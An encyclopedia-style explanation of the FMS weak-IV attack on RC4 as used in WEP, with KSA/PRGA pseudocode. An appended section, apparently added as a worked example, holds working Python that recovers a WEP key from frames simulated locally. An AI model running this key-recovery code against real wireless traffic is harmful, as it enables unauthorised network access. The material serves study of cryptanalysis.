In cryptography, the Fluhrer, Mantin and Shamir attack is a stream cipher attack on the widely used RC4 stream cipher.

The attack allows an attacker to recover the key of an RC4-encrypted stream from a large number of messages in that stream.

The Fluhrer, Mantin and Shamir attack applies to specific key derivation methods, but does not apply in general to RC4-based SSL (TLS), since SSL generates the encryption keys it uses for RC4 by hashing, meaning that different SSL sessions have unrelated keys.[1] However, the closely related bar mitzvah attack, based on the same research and revealed in 2015, does exploit those cases where weak keys are generated by the SSL keying process.

## Background

The Fluhrer, Mantin and Shamir (FMS) attack, published in their 2001 paper “Weaknesses in the Key Scheduling Algorithm of RC4”,[2] takes advantage of a weakness in the RC4 key scheduling algorithm to reconstruct the key from encrypted messages. The FMS attack gained popularity in network attack tools including AirSnort, weplab, and aircrack, which use it to recover the key used by WEP-protected wireless networks.

This discussion will use the below RC4 key scheduling algorithm (KSA).

```
begin ksa(with int keylength, with byte key[keylength])
    for i from 0 to 255
        S[i] := i
    endfor
    j := 0
    for i from 0 to 255
        j := (j + S[i] + key[i mod keylength]) mod 256
        swap(S[i], S[j])
    endfor
end
```

The following pseudo-random generation algorithm (PRGA) will also be used.

```
begin prga(with byte S[256])
    i := 0
    j := 0
    while GeneratingOutput:
        i := (i + 1) mod 256
        j := (j + S[i]) mod 256
        swap(S[i], S[j])
        output S[(S[i] + S[j]) mod 256]
    endwhile
end
```

## The attack

The basis of the FMS attack lies in the use of weak initialization vectors (IVs) with RC4. RC4 encrypts one byte at a time by XORing it with a keystream byte output by prga(); RC4 uses the key to initialize a state machine via ksa(), and then continuously modifies the state and generates a new byte of the keystream from the new state. Ideally the keystream would behave like a random one-time pad, since a pseudo-random number generator controls the output at each step; the FMS attack exploits the fact that, for certain keys, the first output byte is correlated with the key.

With certain IVs, an attacker who knows the first byte of the keystream and the first m bytes of the key can derive the (m + 1)th byte of the key due to a weakness in the KSA. Because the first byte of the plaintext comes from the WEP SNAP header, which is almost always 0xAA, the attacker can assume that the first byte of the keystream is B ⊕ 0xAA, where B is the first byte of the ciphertext. From there, he only needs IVs of the form (a + 3, n − 1, x), where a is the index of the key byte under attack (counting from the first byte after the IV), n is the size of the element value space (256, since each element is one byte), and x is any value. To start, with a equal to 0, the attacker needs IVs of the form (3, 255, x). WEP uses 24-bit IVs, so each IV consists of three one-byte values, and WEP prepends the IV to the secret key to form the per-packet RC4 key.

To start, the attacker uses the IV as the first 3 elements of K[ ]. He fills the S-box S[ ] with sequential values from 0 to n − 1, as RC4 does when initializing the S-box from a known K[ ]. He then performs the first 3 iterations of ksa() to begin initializing the S-box.

After the third step, the attacker can possibly, but not definitely, derive the fourth byte of the key from the first keystream output byte O by computing (O − j − S[i]) mod n = K[i], with i = 3 at this step and with j and S[ ] as they stand after the third iteration. The derivation only holds when the entries of S[ ] that the first PRGA output depends on (S[0], S[1] and S[3]) are not swapped again during the remaining iterations of ksa(), which happens for only a small fraction of packets (roughly 5%); for later key bytes, S[ ] is no longer close to the identity permutation, so O must first be mapped back to the position it occupied in S[ ] before the subtraction is applied.

At this point, the attacker does not yet have the fourth byte of the key. This procedure does not produce the next byte of the key outright; it generates a possible value for it. By collecting multiple messages, for example WEP packets, and repeating these steps, the attacker will generate a number of different possible values. The correct value appears significantly more frequently than any other; the attacker can determine the key byte by recognizing this value and selecting it as the next byte. At this point, he can start the attack over again on the fifth byte of the key.

Although the attacker cannot attack words of the key out of order, he can store messages for later sequential attacks on later words once he knows earlier words. Again, he only needs messages with weak IVs, and can discard the others. Through this process, he can gather a large number of messages for an attack on the entire key; in fact, he need only store a short portion of the beginning of those messages, just enough to carry the attack out as far as the word of the key that the IV allows him to attack.
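The KSA and PRGA listed in the Background section and the byte-by-byte procedure described above, as an added worked example that is not code from the article or from the FMS paper: RC4 in Python, a constructed WEP-style capture in which each frame is encrypted under IV || secret with 0xAA as the first plaintext byte, and the vote-based recovery of a 40-bit secret from frames with IVs of the form (a + 3, 255, x). The secret key, the frame generator and all function names are assumptions made for the simulation. Two points go beyond the text and are marked as such in the code: for key bytes after the first, the candidate is computed from the position of the output byte in S[ ] rather than from the output byte itself, and the recovery branches over the best few candidates per byte, accepting a key only when it decrypts the first byte of the captured frames back to 0xAA.

```python
# Added example, not code from the article: RC4 (ksa/prga as in the text) and
# a self-contained simulation of the FMS weak-IV attack on a WEP-style key
# (per-frame key = 3-byte IV || secret). All frames are constructed locally.
N = 256
SNAP = 0xAA  # first plaintext byte of a WEP data frame (SNAP header)


def ksa(key):
    """RC4 key scheduling: returns the state permutation S."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S


def prga(S, n):
    """RC4 keystream generator: n bytes from a copy of state S."""
    S = S[:]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return bytes(out)


def rc4(key, data):
    return bytes(d ^ k for d, k in zip(data, prga(ksa(key), len(data))))


def wep_frame(iv, secret):
    """Constructed capture: (iv, first ciphertext byte) under key iv || secret."""
    iv = bytes(iv)
    return iv, rc4(iv + secret, bytes([SNAP]))[0]


def fms_candidate(iv, first_ct, known):
    """One vote for secret byte a = len(known), i.e. K[a+3], from one frame.
    Runs the first a+3 KSA steps with the known prefix iv || known, checks that
    S[0] and S[1] still hold what the weak IV set up (otherwise the frame gives
    no information), then solves for K[a+3]. Returns None if the check fails.
    """
    a = len(known)
    out = first_ct ^ SNAP  # first keystream byte (known plaintext)
    key = list(iv) + list(known)
    S = list(range(N))
    j = 0
    for i in range(a + 3):
        j = (j + S[i] + key[i]) % N
        S[i], S[j] = S[j], S[i]
    if S[1] >= a + 3 or (S[1] + S[S[1]]) % N != a + 3:
        return None
    # If S[0], S[1] and S[a+3] survive the remaining KSA steps, the first PRGA
    # output is S[j_next] with j_next = j + S[a+3] + K[a+3]. S.index undoes the
    # permutation; for a = 0 it is nearly the identity, giving the text's formula.
    j_next = S.index(out)
    return (j_next - j - S[a + 3]) % N


def recover_key(frames, key_len, depth=4):
    """Recover the secret byte by byte from the votes of weak-IV frames.
    Addition to the text's procedure: branch over the `depth` best-voted
    candidates per byte and accept a key only if it decrypts the first byte of
    the sample frames to SNAP, so a byte whose true value is not the top vote
    still recovers.
    """
    def verify(secret):
        return all(rc4(iv + secret, bytes([ct]))[0] == SNAP
                   for iv, ct in frames[:8])

    def search(known):
        if len(known) == key_len:
            return known if verify(known) else None
        a = len(known)
        votes = [0] * N
        for iv, ct in frames:
            if iv[0] == a + 3 and iv[1] == N - 1:  # weak IV (a+3, 255, x)
                v = fms_candidate(iv, ct, known)
                if v is not None:
                    votes[v] += 1
        for cand in sorted(range(N), key=lambda b: -votes[b])[:depth]:
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


def demo(secret=bytes([0x1B, 0x7E, 0x5A, 0xC3, 0x91])):
    """Constructed 40-bit key; one frame per weak IV (a+3, 255, x) for each
    key byte a. Returns True if the attack recovers the secret."""
    frames = [wep_frame((a + 3, N - 1, x), secret)
              for a in range(len(secret)) for x in range(N)]
    return recover_key(frames, len(secret)) == secret
```

demo() feeds 256 weak-IV frames per key byte (1280 in total) to recover_key(). Against real WEP traffic those IVs are only a small fraction of what is captured, which is why the tools named in the Background section need millions of packets; the attacker keeps only the IV and the first ciphertext byte of each, exactly as the text says.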